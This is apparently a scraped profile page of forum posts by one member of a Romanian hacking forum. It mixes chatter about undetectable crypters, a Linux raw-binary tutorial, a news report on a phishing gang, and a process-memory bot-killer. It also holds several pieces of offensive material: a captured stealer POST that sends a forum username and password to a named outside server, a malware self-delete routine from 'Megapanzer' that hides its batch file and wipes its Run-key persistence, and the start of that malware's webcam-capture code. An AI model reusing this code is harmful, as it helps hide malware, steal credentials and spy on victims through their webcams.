Everything posted by Nytro
-
I might make a FUD version (4.0), but it will be private for a while.
-
See my tutorial; all the codes appear there and they are also explained a little.
-
I will make it so those things can be edited.
-
It needs .NET 2.0 if DrGrim selected that, or .NET 3.5 if he didn't select it at "New Project", but normally it doesn't need 3.5. And pretty much anything you write in VB2008 is FUD, but I can't stand the fact that it needs .NET 2.0 at minimum.
-
Maybe, but I think I sing more beautifully :)
-
I'm too lazy; they can be grabbed easily, in the worst case with a packet sniffer. The data is sent via POST to: http://www.infraburo.co.za/documents/system/logs.php

    POST /documents/system/logs.php HTTP/1.0
    Connection: keep-alive
    Content-Type: multipart/form-data; boundary=--------031609160339281
    Content-Length: 262
    Host: www.infraburo.co.za
    Accept: text/html, */*
    User-Agent: Mozilla/3.0 (compatible; Indy Library)

    ----------031609160339281
    Content-Disposition: form-data; name="mata"

    ______________________________<br>http://rstcenter.com<br>vb_login_username = UnTest<br>*newpasswordconfirm = *******<br>______________________________<br>
    ----------031609160339281--
-
Still, don't generalize: not everyone who listens to manele does this. Oh, yes. It's not only manele listeners who sing, others sing too, but with another music genre you racists find it normal.
-
vBulletin Spammer is an FF Stealer; I don't think this one is anything else. He's banned. Anyway, I don't use Firefox, so there's nothing for it to steal.
-
Strange: http://www.virustotal.com/ro/analisis/27e475f3ad40de7f454d16466e65a44d

Nothing found. I ran it, nothing happened. I saw Winsock API in the imports... There's nothing at startup, no process, nothing. I don't know what to say.
-
cat > a.out
Writing Linux programs in raw binary
by G-Brain

C

Let's begin with Linux system calls. A system call is a request made by a program to the operating system for performing certain tasks. System calls provide the interface between a process and the operating system. A good example of a Linux system call is _exit:

    void _exit(int status)

The function _exit() terminates the calling process "immediately". Any open file descriptors belonging to the process are closed; any children of the process are inherited by process 1, init, and the process's parent is sent a SIGCHLD signal. The value of status is returned to the parent process as the process's exit status.

In a C program, you could use _exit like this:

    _exit(0)

Ending the program with a status of 0, indicating success. Another example of a system call is write:

    ssize_t write(int fd, const void *buf, size_t count)

write() writes up to count bytes from the buffer pointed to by buf to the file referred to by the file descriptor fd. On success, the number of bytes written is returned (zero indicates nothing was written). On error, -1 is returned, and errno is set appropriately.

Here's how you'd use write() from a C program:

    write(1,"Test\n",5)

There are 3 standard POSIX file descriptors (Linux complies with this part of the POSIX standard):

    0 = Standard Input (stdin)
    1 = Standard Output (stdout)
    2 = Standard Error (stderr)

So what the above line of code would do, is write "Test\n" up to the 5th byte to file descriptor 1, standard output. That should explain how system calls work.

System call table: http://docs.cs.up.ac.za/programming/asm/derick_tut/syscalls.html

To get system call documentation, use man 2 syscall. For example:

    man 2 write

Here's a C program using the two syscalls we learned:

syscall.c

    #include <unistd.h>

    int main()
    {
        write(1,"Test\n",5);
        _exit(0);
    }

To compile:

    $ gcc -o syscall syscall.c

To see what system calls are being made, use strace:

    $ strace ./syscall
    execve("./syscall", ["./syscall"], [/* 42 vars */]) = 0
    brk(0) = 0x804a000
    access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
    open("/etc/ld.so.cache", O_RDONLY) = 3
    fstat64(3, {st_mode=S_IFREG|0644, st_size=136536, ...}) = 0
    mmap2(NULL, 136536, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7fc2000
    close(3) = 0
    open("/lib/libc.so.6", O_RDONLY) = 3
    read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\360d\1"..., 512) = 512
    fstat64(3, {st_mode=S_IFREG|0755, st_size=1575187, ...}) = 0
    mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fc1000
    mmap2(NULL, 1357360, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb7e75000
    mmap2(0xb7fbb000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x146) = 0xb7fbb000
    mmap2(0xb7fbe000, 9776, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7fbe000
    close(3) = 0
    mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7e74000
    set_thread_area({entry_number:-1 -> 6, base_addr:0xb7e746c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0
    mprotect(0xb7fbb000, 4096, PROT_READ) = 0
    munmap(0xb7fc2000, 136536) = 0
    write(1, "Test\n", 5Test ) = 5
    exit_group(0) = ?
    Process 3492 detached

Never mind that stuff at the top, you can see our two system calls being executed at the bottom.

Assembler

Try opening the executable we created above (syscall) in a hex editor. It's huge, and it's full of stuff we don't need. Surely, we could use some GCC flags to make it smaller, but to really understand what's going on, we'll have to write our stuff in assembler.

syscall2.asm

    format ELF executable
    entry _start

    segment readable executable

    _start:
        mov al, 4
        mov bl, 1
        mov ecx, message
        mov dl, messageLen
        call 0xffffe414

        mov al, 1
        mov bl, 0
        call 0xffffe414

    segment readable writable

    message db 'Test',0x0a
    messageLen = $-message

Which can be assembled using the following command:

    $ fasm syscall2.asm

Note that we're using fasm, the flat assembler (http://www.flatassembler.net), because it produces neat code and doesn't clutter our executables like nasm does. Let's go through the code:

    format ELF executable
    entry _start

We want an ELF executable, and we want it to start at _start.

    segment readable executable

A.K.A. section .text. This tells the assembler that everything under this line will be readable and executable (= code) unless stated otherwise (with a new "segment" instruction).

    _start:

This is the entry point of our program.

    mov al, 4
    mov bl, 1
    mov ecx, message
    mov dl, messageLen
    call 0xffffe414

Woah, what's that? I'll tell you what it is:

    write(1,"Test\n",5)

The syscall number for write() is 4, 1 is standard output, message is "Test\n", messageLen is 5, and call 0xffffe414 calls the kernel. So what we do is, we put the syscall number in the al register, the arguments in the other registers and then we call the kernel with call 0xffffe414. Pretty easy.

Now, the memory location 0xffffe414 might need a bit of explanation: Since Linux 2.5.53 there is a fixed page, called the vsyscall page, filled by the kernel. At kernel initialization time the routine sysenter_setup() is called. It sets up a non-writable page and writes code for the sysenter instruction if the CPU supports that, and for the classical int 0x80 otherwise. Thus, the C library can use the fastest type of system call by jumping to a fixed address in the vsyscall page. The vsyscall page is mapped in the memory of every process at 0xffffe000-0xffffefff.

To read the vsyscall page:

get_vsyscall_page.c

    #include <unistd.h>
    #include <string.h>

    int main()
    {
        char *p = (char *) 0xffffe000;
        char buf[4096];
        memcpy(buf, p, 4096);
        write(1, buf, 4096);
        return 0;
    }

    $ gcc -o get_vsyscall_page get_vsyscall_page.c
    $ ./get_vsyscall_page > vsyscall_page
    $ objdump -d vsyscall_page

    syscall_page:     file format elf32-i386

    Disassembly of section .text:

    ffffe400 <__kernel_sigreturn>:
    ffffe400:   58                      pop    %eax
    ffffe401:   b8 77 00 00 00          mov    $0x77,%eax
    ffffe406:   cd 80                   int    $0x80
    ffffe408:   90                      nop
    ffffe409:   8d 76 00                lea    0x0(%esi),%esi

    ffffe40c <__kernel_rt_sigreturn>:
    ffffe40c:   b8 ad 00 00 00          mov    $0xad,%eax
    ffffe411:   cd 80                   int    $0x80
    ffffe413:   90                      nop

    ffffe414 <__kernel_vsyscall>:
    ffffe414:   51                      push   %ecx
    ffffe415:   52                      push   %edx
    ffffe416:   55                      push   %ebp
    ffffe417:   89 e5                   mov    %esp,%ebp
    ffffe419:   0f 34                   sysenter
    ffffe41b:   90                      nop
    ffffe41c:   90                      nop
    ffffe41d:   90                      nop
    ffffe41e:   90                      nop
    ffffe41f:   90                      nop
    ffffe420:   90                      nop
    ffffe421:   90                      nop
    ffffe422:   eb f3                   jmp    ffffe417 <__kernel_vsyscall+0x3>
    ffffe424:   5d                      pop    %ebp
    ffffe425:   5a                      pop    %edx
    ffffe426:   59                      pop    %ecx
    ffffe427:   c3                      ret

As you can see, on my system __kernel_vsyscall is at memory location 0xffffe414. This is what we'll use to call the kernel. If the address is different on your system, use that instead.

Let's move on:

    mov al, 1
    mov bl, 0
    call 0xffffe414

System call 1 is exit, its first argument status is 0, so we get:

    _exit(0)

Makes sense, right? On with the show:

    segment readable writable

    message db 'Test',0x0a
    messageLen = $-message

readable, writable = data
db = define byte
$ = the current address.

Define message as an array of bytes. Define messageLen as the current address minus the address of message. This is a cool trick to calculate string length.

Now, let's strace our program to see how awesome it is:

    $ fasm syscall2.asm
    $ strace ./syscall2
    execve("./syscall2", ["./syscall2"], [/* 43 vars */]) = 0
    write(1, "Test\n", 5Test ) = 5
    _exit(0) = ?
    Process 3627 detached

Two beautiful syscalls.

Hexadecimal

Let's take a look at the syscall2 executable we produced in hexadecimal. I'll be using emacs' hexl-mode. Use whatever you like.

    87654321  0011 2233 4455 6677 8899 aabb ccdd eeff  0123456789abcdef
    00000000: 7f45 4c46 0101 0100 0000 0000 0000 0000  .ELF............
    00000010: 0200 0300 0100 0000 7480 0408 3400 0000  ........t...4...
    00000020: 0000 0000 0000 0000 3400 2000 0200 2800  ........4. ...(.
    00000030: 0000 0000 0100 0000 7400 0000 7480 0408  ........t...t...
    00000040: 7480 0408 1900 0000 1900 0000 0500 0000  t...............
    00000050: 0010 0000 0100 0000 8d00 0000 8d90 0408  ................
    00000060: 8d90 0408 0500 0000 0500 0000 0600 0000  ................
    00000070: 0010 0000 b004 b301 b98d 9004 08b2 05e8  ................
    00000080: 9063 fbf7 b001 b300 e887 63fb f754 6573  .c........c..Tes
    00000090: 740a                                     t.

Now what the hell is that? Well, actually, it's not that hard. You just need to have the right documents. The outer parts are added by hexl-mode; they indicate the address of each byte. The first part is just the ELF header, up to 0x74, where our actual program is loaded:

    b004 b301 b98d 9004 08b2 05e8 9063 fbf7 b001 b300 e887 63fb f754 6573 740a

That's it. That's our whole program. Seriously. Let's try translating it back to assembler. Reading the Intel Software Developers Manual Volume 2A (http://download.intel.com/design/processor/manuals/253666.pdf), Appendix A: Opcode map, we discover the following:

b0 means: move immediate byte into the AL register (referring to the next byte, 04)

    b0 04            mov al, 4

b3 means: move immediate byte into BL register

    b3 01            mov bl, 1

b9 means: move immediate word or double into the eCX register (referring to 8d 90 04 08)

8d 90 04 08 is the address of message. It's reversed because I'm on a little-endian architecture. 0x0804908d is where our data is loaded, and message is the first piece of data, so it's at offset 0, which is address 0x0804908d again.

    b9 8d 90 04 08   mov ecx, message

b2 means: move immediate byte into DL register

    b2 05            mov dl, messageLen

And to top it off... call the kernel! e8 means: call the next offset to be added to the instruction pointer register.

    e8 90 63 fb f7   call 0xffffe414

Now how does 90 63 fb f7 translate to 0xffffe414? Firstly, my byte order is little endian, so the actual address is 0xf7fb6390 (putting the bytes in reverse order). How do we get to this number? We take the address we want to call, 0xffffe414, and we subtract the instruction pointer from it (the starting point of our program, 0x08048074, plus the size of the instructions so far, which is 0x10, resulting in 0x08048084). So:

    (addr - ip)
    (0xffffe414 - (0x08048074 + 0x10)) = 0xf7fb6390

One more time from the beginning:

    write(1,"Test\n",5);

    mov al, 4
    mov bl, 1
    mov ecx, message
    mov dl, messageLen
    call 0xffffe414

    b0 04
    b3 01
    b9 8d 90 04 08
    b2 05
    e8 90 63 fb f7

It makes perfect sense! Now, for exiting:

    exit(0);

    mov al, 1
    mov bl, 0
    call 0xffffe414

    b0 01
    b3 00
    e8 87 63 fb f7

Note that these are 9 bytes, so the instruction pointer increases by 9, resulting in:

    (0xffffe414 - (0x08048074 + 0x19)) = 0xf7fb6387

As the address to call. And the last part....

    54 65 73 74 0a   Test\n

Now the whole thing one more time:

    write(1,"Test\n",5);
    exit(0);

    mov al, 4
    mov bl, 1
    mov ecx, message
    mov dl, messageLen
    call 0xffffe414
    mov al, 1
    mov bl, 0
    call 0xffffe414
    message db 'Test',0x0a
    messageLen = $-message

    b0 04 b3 01 b9 8d 90 04 08 b2 05 e8 90 63 fb f7 b0 01 b3 00 e8 87 63 fb f7 54 65 73 74 0a

You can read hexadecimal!

Binary

At last, you will find out how to write programs in binary. Hexadecimal is actually shorthand for binary, so the right numbers are already there, we just have to convert from base 16 (hex) to base 2 (bi). Here's a table:

    0: 0000    4: 0100    8: 1000    C: 1100
    1: 0001    5: 0101    9: 1001    D: 1101
    2: 0010    6: 0110    A: 1010    E: 1110
    3: 0011    7: 0111    B: 1011    F: 1111

So let's try to convert "Test\n" to binary. Here's it in hexadecimal:

    54 65 73 74 0a

5 hexadecimal is 0101 binary. 4 hexadecimal is 0100 binary. 54 hexadecimal is 0101 0100 binary! The full string:

    T         e         s         t         \n
    5    4    6    5    7    3    7    4    0    a
    0101 0100 0110 0101 0111 0011 0111 0100 0000 1010

It's that simple! You can just convert all the numbers individually. For more about base conversion, Google it.

Converting our entire program to binary is simple:

    b0 04 b3 01 b9 8d 90 04 08 b2 05 e8 90 63 fb f7 b0 01 b3 00 e8 90 63 fb f7 54 65 73 74 0a

    1011 0000 0000 0100
    1011 0011 0000 0001
    1011 1001 1000 1101 1001 0000 0000 0100 0000 1000
    1011 0010 0000 0101
    1110 1000 1001 0000 0110 0011 1111 1011 1111 0111
    1011 0000 0000 0001
    1011 0011 0000 0000
    1110 1000 1001 0000 0110 0011 1111 1011 1111 0111
    0101 0100 0110 0101 0111 0011 0111 0100 0000 1010

And that's all there is to it! Of course, a sequence of bits like that is unmaintainable, but now you know: how it works.

Comments? Suggestions? Drop me a line at g-brain@g-brain.net.
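The ELF layout and the rel32 call displacements the tutorial decodes by hand, as an added Python example that is not part of G-Brain's post: it assembles the same instruction bytes, wraps them in the 52-byte ELF header and the two PT_LOAD program headers that fasm emitted, computes both call displacements from the address of the next instruction, and checks that the 146-byte result is identical to the hexl-mode dump above. The entry point (0x08048074), the data address (0x0804908d) and the vsyscall address (0xffffe414) are the tutorial's own numbers; everything else is derived from them.

```python
import struct

# Numbers taken from the tutorial: entry point of the code segment, address of the
# data segment, and the __kernel_vsyscall address observed on the author's machine.
ENTRY      = 0x08048074
DATA_VADDR = 0x0804908d
VSYSCALL   = 0xffffe414

# The hexl-mode dump from the tutorial, joined into one hex string; used as the reference.
PAGE_DUMP = (
    "7f454c46010101000000000000000000"
    "02000300010000007480040834000000"
    "00000000000000003400200002002800"
    "00000000010000007400000074800408"
    "74800408190000001900000005000000"
    "00100000010000008d0000008d900408"
    "8d900408050000000500000006000000"
    "00100000b004b301b98d900408b205e8"
    "9063fbf7b001b300e88763fbf7546573"
    "740a"
)


def rel32(call_addr, target):
    """Displacement for an E8 call: target minus the address of the *next* instruction
    (call_addr + 5), wrapped to 32 bits and emitted little-endian."""
    return struct.pack("<I", (target - (call_addr + 5)) & 0xFFFFFFFF)


def assemble(entry=ENTRY, data_vaddr=DATA_VADDR, vsyscall=VSYSCALL):
    """Hand-assemble syscall2.asm; returns (code_bytes, data_bytes)."""
    message = b"Test\n"
    code = bytearray()
    code += b"\xb0\x04"                                   # mov al, 4   (sys_write)
    code += b"\xb3\x01"                                   # mov bl, 1   (stdout)
    code += b"\xb9" + struct.pack("<I", data_vaddr)       # mov ecx, message
    code += b"\xb2" + bytes([len(message)])               # mov dl, messageLen
    code += b"\xe8" + rel32(entry + len(code), vsyscall)  # call __kernel_vsyscall
    code += b"\xb0\x01"                                   # mov al, 1   (sys_exit)
    code += b"\xb3\x00"                                   # mov bl, 0
    code += b"\xe8" + rel32(entry + len(code), vsyscall)  # call __kernel_vsyscall
    return bytes(code), message


def build_elf(code, data, entry=ENTRY, data_vaddr=DATA_VADDR):
    """Minimal ELF32 i386 executable: header, two PT_LOAD program headers, code, data."""
    ehsize, phentsize, phnum = 52, 32, 2
    code_off = ehsize + phentsize * phnum        # 0x74, the tutorial's "up to 0x74"
    data_off = code_off + len(code)              # 0x8d
    ident = b"\x7fELF" + bytes([1, 1, 1, 0]) + b"\x00" * 8   # ELFCLASS32, LSB, version 1
    ehdr = ident + struct.pack(
        "<HHIIIIIHHHHHH",
        2, 3, 1,                             # e_type ET_EXEC, e_machine EM_386, e_version
        entry, ehsize, 0, 0,                 # e_entry, e_phoff, e_shoff, e_flags
        ehsize, phentsize, phnum, 40, 0, 0,  # sizes and counts; no section headers
    )

    def phdr(offset, vaddr, size, flags):
        # p_type PT_LOAD, p_offset, p_vaddr, p_paddr, p_filesz, p_memsz, p_flags, p_align
        return struct.pack("<IIIIIIII", 1, offset, vaddr, vaddr, size, size, flags, 0x1000)

    return (ehdr
            + phdr(code_off, entry, len(code), 5)        # R+X: "segment readable executable"
            + phdr(data_off, data_vaddr, len(data), 6)   # R+W: "segment readable writable"
            + code + data)


def matches_page_dump():
    """True when the rebuilt file is byte-for-byte the dump shown in the tutorial."""
    return build_elf(*assemble()).hex() == PAGE_DUMP


if __name__ == "__main__":
    image = build_elf(*assemble())
    print(len(image), "bytes; matches tutorial dump:", matches_page_dump())
    with open("syscall2.rebuilt", "wb") as f:
        f.write(image)
```

The vsyscall address is the one observed on the author's system; current kernels map the vDSO at a randomized address, so the rebuilt file is meant for byte-level comparison with the dump, not for running. The displacement arithmetic is the point the tutorial labours over: a call's rel32 is measured from the end of the 5-byte instruction, which is why the first call is computed against 0x08048084 and the second against 0x0804808d.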
-
Google Chrome
-
A string array with the ASCII codes of the password's characters.
-
Edit: CrackMe: http://rapidshare.com/files/208819072/Project1.exe
-
If you type the password correctly, does it display "10"?
-
The Romanian Police, together with D.I.I.C.O.T. (the Direction for Investigating Organized Crime and Terrorism), has executed an ample operation that has targeted hackers in the western part of the country. Between 15 and 20 persons have been arrested in the cities of Caransebeș, Lugoj, Timișoara, Hunedoara and Pitești under the suspicion of being members of a cybercriminal group. The gang is accused of executing phishing attacks and siphoning money from compromised accounts.

According to local media, they cloned the websites of several banks in Spain and Italy, which they subsequently used to lure people into disclosing their financial information. The Italian Post Office seems to have been the group's main target. The fraudsters sent e-mails impersonating the institution, in which they claimed that customer data had been lost due to technical issues. A link included in the e-mail directed unsuspecting victims to a page masquerading as the Post Office's online payment system. Once on the page, users were asked to input their financial details, which were then being stored on a server under the control of the Romanian phishers.

The gang's M.O. involved "money mules" (people hired to pick up stolen funds) walking into post offices and letting them know via mobile phones that they were good to go. The Romanians then issued online money orders using the banking information of their victims. This allowed the mules to cash in the money and leave in a matter of minutes. Speed was vital to the whole scheme, as the system also sent SMS notifications of the transaction to the mobile phone number provided by the real account holder. In addition, in order to avoid arousing suspicion from the post office employees, the transactions only involved sums of under 1,000 euros. The compromised accounts were also being used to recharge mobile pre-paid SIM cards, heavily used for communication.

One of the arrested individuals, Flavius Brăgăilă, a 21-year-old man from Caransebeș, is suspected of being the head behind the whole operation. According to authorities, he had been coordinating the entire cybercriminal network, which was divided into independent cells operating from different Romanian and Italian cities. Ovidiu Andraș, son of the manager of the BCR (Romanian Commercial Bank) branch in Caransebeș, was also one of the individuals who were arrested.

It was also noted that one of the detained persons was accused of hacking into several servers belonging to N.A.S.A. and various U.S. universities and using them to launch attacks that targeted banks. Details about this are yet scarce, but it is possible that these servers have been used to host the fake cloned websites. Cosmin Bolosin, the attorney for four of the people detained in Caransebeș, commented for Caras Online that "[…] Even though people are speaking about those NASA servers, for the time being we haven't been presented with anything official in this respect. […] As far as the penal procedure is concerned, I can confirm that it has been fully respected and that the search warrants were legal. I was even a bit surprised." Meanwhile, the D.I.I.C.O.T. prosecutors pointed out that the network had been under surveillance for the past year.

Source: http://news.softpedia.com/news/Romanian-Police-Takes-Down-Cybercriminal-Gang-106717.shtml
-
I don't know anything about the results, I haven't received anything; my class teacher told me from unofficial sources that I might have taken first place. luyzette: Were you at the presentation? Or just at that thing in the amphitheater when those people talked and played 2 videos: Romania and Tg. Jiu?
-
It doesn't get past much of anything.
-
I'm good at it... At handing out bans.
-
Is your decryption algorithm still any good?
-
RS Mirror: http://rapidshare.com/files/207975537/CQKiller.rar
-
B.o.t Killer by a59

This function searches through all running processes, except black listed ones, and then uses the ReadProcessMemory function to check for specified strings found in common bots. If any of the strings are found in the process's memory the process will be killed and the file deleted. Should be simple to modify for other types of unwanted programs.

/* BotKiller Coded by a59 */
#include <windows.h>
#include <stdio.h>
#include <tlhelp32.h>

void DoSearch( unsigned long uStartAddr, unsigned long uEndAddr, PROCESSENTRY32 pe32 );
void KillBot( PROCESSENTRY32 pe32 );

struct s_Search
{
    char* szBot;
    char* szString;
};

s_Search sSearch[ ] =
{
    { "VNC Scanning server", "\x52\x46\x42\x20\x30\x30\x33\x2E\x30\x30\x38\x0A" },
    { "RXBot", "[MAIN]" },
    { "RXBot", "[SCAN]" },
    { "RXBot", "[FTP]" },
    { "Unknown", "&echo bye" },
    { NULL, NULL }
};

void DoSearch( unsigned long uStartAddr, unsigned long uEndAddr, PROCESSENTRY32 pe32 )
{
    char szBigBuffer[ 0x5000 ] = { 0 };
    unsigned char Curbuf[ 0x500 ] = { 0 };
    HANDLE hProcess = OpenProcess( PROCESS_ALL_ACCESS, FALSE, pe32.th32ProcessID );

    printf( "Scanning PID: %d [ %s ]\nStart Address: 0x%08X End Address: 0x%08X\n\n",
            pe32.th32ProcessID, pe32.szExeFile, uStartAddr, uEndAddr );

    for( unsigned long uCurAddr = uStartAddr; uCurAddr <= uEndAddr; uCurAddr++ )
    {
        BOOL bRead = ReadProcessMemory( hProcess, (void *)uCurAddr, (void *)&Curbuf, sizeof( Curbuf ), NULL );
        if( bRead )
        {
            int c = 0;
            strcat( szBigBuffer, (char *)Curbuf );
            while( sSearch[ c ].szString != NULL )
            {
                if( strstr( szBigBuffer, sSearch[ c ].szString ) )
                {
                    printf( "Found string \"%s\" in \"%s\" server \"%s\"\n\n",
                            sSearch[ c ].szString, pe32.szExeFile, sSearch[ c ].szBot );
                    KillBot( pe32 );
                }
                c++;
            }
            if( sizeof( szBigBuffer ) > 0x150 )
                ZeroMemory( szBigBuffer, sizeof( szBigBuffer ) );
        }
        if( !bRead )
            break;
    }
    CloseHandle( hProcess );
};

void KillBot( PROCESSENTRY32 pe32 )
{
    MODULEENTRY32 me32 = { 0 };
    HANDLE hPath = CreateToolhelp32Snapshot( TH32CS_SNAPMODULE, pe32.th32ProcessID );
    HANDLE hKillProcess;

    me32.dwSize = sizeof( me32 );
    BOOL bRetval = Module32First( hPath, &me32 );
    while( bRetval )
    {
        if( !strcmp( pe32.szExeFile, me32.szModule ) )
        {
            SetFileAttributes( me32.szExePath, FILE_ATTRIBUTE_NORMAL );
            hKillProcess = OpenProcess( PROCESS_ALL_ACCESS, FALSE, pe32.th32ProcessID );
            TerminateProcess( hKillProcess, 0 );
            Sleep( 500 );
            if( DeleteFile( me32.szExePath ) )
                printf( "Terminated and deleted %s\n", me32.szExePath );
        }
        bRetval = Module32Next( hPath, &me32 );
    }
    CloseHandle( hKillProcess );
    CloseHandle( hPath );
};

int main( )
{
    char szFile[ 128 ];
    GetModuleFileName( GetModuleHandle( NULL ), szFile, sizeof( szFile ) );
    char* szBlockList[ ] = { "explorer.exe", "hidserv.exe", "WINLOGON.EXE", "SERVICES.EXE", szFile };
    HANDLE hProcess = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );
    PROCESSENTRY32 pe32;
    pe32.dwSize = sizeof( PROCESSENTRY32 );
    BOOL bRetval = Process32First( hProcess, &pe32 );
    bool bDoSearch = true;

    while( bRetval )
    {
        Sleep( 250 );
        for( int i = 0; i < ( sizeof( szBlockList ) / sizeof( char* ) ); i++ )
        {
            if( strstr( szBlockList[ i ], pe32.szExeFile ) )
                bDoSearch = false;
        }
        if( bDoSearch )
        {
            DoSearch( 0x00400000, 0x004FFFFF, pe32 );
            DoSearch( 0x00100000 ,0x001FFFFF, pe32 );
        }
        else
            bDoSearch = true;
        bRetval = Process32Next( hProcess, &pe32 );
    }
    CloseHandle( hProcess );
    printf( "Done scanning, press ENTER to exit this program.\n" );
    getchar( );
    return 0;
};

Self Delete
Credit: carrumba

#include <windows.h>
#include <stdio.h>
#include <shlwapi.h>
#include <time.h>
#include "Megapanzer_Definitions.h"

extern char gRealRegistryName[MAX_BUF_SIZE + 1];

int selfDelete()
{
    WIN32_FIND_DATA lFileData;
    HANDLE lSearchHandle;
    char lFilePattern[MAX_BUF_SIZE + 1];
    char lTemp[MAX_BUF_SIZE + 1];
    char lTempDirectory[MAX_BUF_SIZE + 1];
    char lCWD[MAX_BUF_SIZE + 1];
    char lBatchFileNameFullPath[MAX_BUF_SIZE + 1];
    char lCommand[MAX_BUF_SIZE + 1];
    char lProgramName[MAX_BUF_SIZE + 1];
    HKEY lRegistryHeaps[] = {HKEY_LOCAL_MACHINE, HKEY_CURRENT_USER, NULL};
    HKEY lKeyHandle;
    long lEnumRet = 0;
    DWORD lLength = 100;
    time_t lTimeStamp;
    int lRetVal = 0;
    int lFuncRetVal = 0;
    int lCounter = 0;
    int lCounter2 = 0;

    ////
    // initialization
    ////
    ZeroMemory(lProgramName, sizeof(lProgramName));
    ZeroMemory(lTemp, sizeof(lTemp));
    ZeroMemory(lTempDirectory, sizeof(lTempDirectory));
    ZeroMemory(lCWD, sizeof(lCWD));
    ZeroMemory(lBatchFileNameFullPath, sizeof(lBatchFileNameFullPath));
    ZeroMemory(&lTimeStamp, sizeof(lTimeStamp));
    GetModuleFileName(NULL, lProgramName, sizeof(lProgramName));
    time(&lTimeStamp);

    ////
    // create temporary directory
    ////
    if (GetTempPath(sizeof(lTempDirectory) - 1, lTempDirectory) > 0)
        if (lTempDirectory[strlen(lTempDirectory) - 1] != '\\')
            strcat(lTempDirectory, "\\");

    ////
    // generate batch file name
    ////
    GetCurrentDirectory(sizeof(lCWD) - 1, lCWD);
    if (lCWD[strlen(lCWD) - 1] != '\\')
        strcat(lCWD, "\\");

    _snprintf(lBatchFileNameFullPath, sizeof(lBatchFileNameFullPath) - 1, "%s%d.bat", lTempDirectory, lTimeStamp);
    printToFile(lBatchFileNameFullPath, "@echo off");
    printToFile(lBatchFileNameFullPath, ":Repeat");
    ZeroMemory(lCommand, sizeof(lCommand));
    _snprintf(lCommand, sizeof(lCommand) - 1, "@del /F \"%s\"", lProgramName);
    printToFile(lBatchFileNameFullPath, lCommand);
    ZeroMemory(lCommand, sizeof(lCommand));
    _snprintf(lCommand, sizeof(lCommand) - 1, "if exist \"%s\" goto Repeat", lProgramName);
    printToFile(lBatchFileNameFullPath, lCommand);

    ////
    // generate delete entry for registry keys/values
    ////
    for(lCounter = 0; lRegistryHeaps[lCounter] != NULL; lCounter++)
    {
        if (RegOpenKeyEx(lRegistryHeaps[lCounter], "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_READ, &lKeyHandle) == ERROR_SUCCESS)
        {
            lCounter2 = 0;
            ZeroMemory(lTemp, sizeof(lTemp));
            lLength = sizeof(lTemp) - 1;
            while((lEnumRet = RegEnumValue(lKeyHandle, lCounter2, lTemp, &lLength, NULL, NULL, NULL, NULL)) == ERROR_SUCCESS)
            {
                if (StrCmpNI(gRealRegistryName, lTemp, sizeof(gRealRegistryName)) == 0)
                {
                    ZeroMemory(lCommand, sizeof(lCommand));
                    if (lRegistryHeaps[lCounter] == CURRENT_USER)
                    {
                        _snprintf (lCommand, sizeof(lCommand) - 1, "@reg delete HKEY_CURRENT_USER\\software\\microsoft\\windows\\currentversion\\run\\ /v %s /f",lTemp);
                        printToFile(lBatchFileNameFullPath, lCommand);
                    }
                    else if (lRegistryHeaps[lCounter] == LOCAL_MACHINE)
                    {
                        _snprintf (lCommand, sizeof(lCommand) - 1, "@reg delete HKEY_LOCAL_MACHINE\\software\\microsoft\\windows\\currentversion\\run\\ /v %s /f",lTemp);
                        printToFile(lBatchFileNameFullPath, lCommand);
                    } // if (lRegistryHeaps[lCou...
                } // if (StrCmpNI(gRealRegistryName, lTemp...

                lLength = sizeof(lTemp) - 1;
                lCounter2++;
                ZeroMemory(lTemp, sizeof(lTemp));
            } // while((lEnumRet = RegEnumValue(lKeyH...
            RegCloseKey(lKeyHandle);
        } // if (RegOpenKeyEx(lReg...
    } // for(lCounter = 0; lRegistryHeaps[lCoun...

    ////
    // delete Mega Panzer files
    ////
    ZeroMemory(lCommand, sizeof(lCommand));
    _snprintf(lCommand, sizeof(lCommand) - 1, "@del /F \"%s\" || move /Y \"%s\" \"%s\"", lBatchFileNameFullPath, lBatchFileNameFullPath, lTempDirectory);
    printToFile(lBatchFileNameFullPath, lCommand);

    ////
    // run batch script
    ////
    ShellExecute(NULL, NULL, lBatchFileNameFullPath, NULL, "c:\\", SW_HIDE);
    exit(lRetVal);
}

int printToFile(char *pOutputFileName, char* pCommandString)
{
    int lRetVal = 0;
    HANDLE lFileHandle = INVALID_HANDLE_VALUE;
    DWORD lBytesWritten = 0;
    char lTemp[MAX_BUF_SIZE + 1];

    if ((lFileHandle = CreateFile(pOutputFileName, GENERIC_WRITE, FILE_SHARE_WRITE, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL)) != INVALID_HANDLE_VALUE)
    {
        SetFilePointer(lFileHandle, 0, 0, FILE_END);
        ZeroMemory(lTemp, sizeof(lTemp));
        snprintf(lTemp, sizeof(lTemp) - 1 , "%s\r\n", pCommandString);
        WriteFile(lFileHandle, lTemp, strlen(lTemp), &lBytesWritten, NULL);
        CloseHandle(lFileHandle);
    }
    return(lRetVal);
}

WebCam Capture
Credit: carrumba

#include <stdio.h>
#include <windows.h>
#include <Vfw.h>
#include "Megapanzer_Definitions.h"

extern HWND gWND;

DWORD WINAPI sendWebcamCaptureInfos(PVOID pParameter)
{
    HWND
        lWndVideoHandle;
    CAPSTATUS lCapStat;
    DWORD lRetVal = 0;
    char *lBMPFileName = "info.bmp";
    char *lJPGFileName = "info.jpg";
    char lJPGFileBaseName[MAX_BUF_SIZE + 1];
    HANDLE lFileHandle = INVALID_HANDLE_VALUE;
    DWORD lJPGFileSize = 0;
    char *lPreEncodedData = NULL;
